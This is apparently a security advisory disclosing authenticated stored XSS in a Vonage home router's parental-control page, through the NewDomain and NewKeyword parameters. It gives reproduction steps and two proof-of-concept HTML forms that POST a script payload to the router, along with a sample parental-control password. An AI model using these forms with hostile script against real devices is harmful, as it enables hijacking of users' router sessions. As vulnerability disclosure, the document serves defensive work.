Vonage Home Router (Stored Xss)

Credit Nu11By73



Overview

During an evaluation of the Vonage home phone router, there were a few different web based vulnerabilities identified. Vonage was contacted almost 18 months ago and a response was received from what was stated as their security department that these vulnerabilities would be fixed. To this date, the vulnerabilities still exists in the current versions of the software. Below is the information of the software and hardware version that this was tested against.

Device Description:
1 port residential gateway
Hardware Version:
VDV-23: 115
Original Software Version:
3.2.11-0.9.40

Exploitation Writeup

The exploitation process for this appliance was fairly trivial. The standard use of a word before the double quote was used as padding since only. This was due to the software removing everything after the script tags which removed the ability to remove changes through the web ui without resetting the device. There were 2 different parameters that allowed the insertion of normal xss test script tags. The parameters were found in the code for the /goform/RgParentalBasic page. The injectable parameters are NewDomain and NewKeyword and the verification steps taken are highlighted below.

Verification

NewKeyword Parameter:
1. Login to the router
2. Click advanced setup
3. Click parental controls
4. In the block these keywords text box enter: test"><script>alert(1)</script>
5. Click the add keyword button to receive the pop up.




NewDomain Parameter:
1. Login to the router
2. Click advanced setup
3. Click parental controls
4. In the block these websites text box enter: test"><script>alert(1)</script>
5. Click the add domain button to receive the pop up.




Proof of concept code:
The code below was used to exploit the application through a standard post. It should be noted that the the researcher had to be logged in to the device before exploitation could take place. Also, there was a mechanism in place with the x and y parameters. These changed every post so they were modified as needed to test the scripts.

NewDomain.html
<html>
<p>Authenticated Stored XSS - Vonage Modem</p>
<form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
<input type="hidden" name="RemoveContentRule" value="0" />
<input type="hidden" name="AddContentRule" value="0" />
<input type="hidden" name="ContentRules" value="0" />
<input type="hidden" name="RuleSelect" value="0" / >
<input type="hidden" name="NewKeyword" value="" / >
<input type="hidden" name="KeywordAction" value="0" />
<input type="hidden" name="NewDomain" value="test"><script>alert(1)</script>" />
<input type="hidden" name="x" value="50" />
<input type="hidden" name="y" value="15" />
<input type="hidden" name="DomainAction" value="1" />
<input type="hidden" name="AllowedDomainAction" value="0" />
<input type="hidden" name="ParentalPassword" value="Broadcom" />
<input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
<input type="hidden" name="AccessDuration" value="30" />
<input type="submit" title="Exploit" />
</form>
</html>


NewKeyword.html
<form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
<input type="hidden" name="RemoveContentRule" value="0" />
<input type="hidden" name="AddContentRule" value="0" />
<input type="hidden" name="ContentRules" value="0" />
<input type="hidden" name="RuleSelect" value="0" / >
<input type="hidden" name="NewKeyword" value="test"><script>alert(1)</script>" / >
<input type="hidden" name="x" value="61" />
<input type="hidden" name="y" value="12" />
<input type="hidden" name="KeywordAction" value="1" />
<input type="hidden" name="NewDomain" value="" />
<input type="hidden" name="DomainAction" value="0" />
<input type="hidden" name="AllowedDomainAction" value="0" />
<input type="hidden" name="ParentalPassword" value="Broadcom" />
<input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
<input type="hidden" name="AccessDuration" value="30" />
<input type="submit" title="Enable Service" />
</form>
<html></p>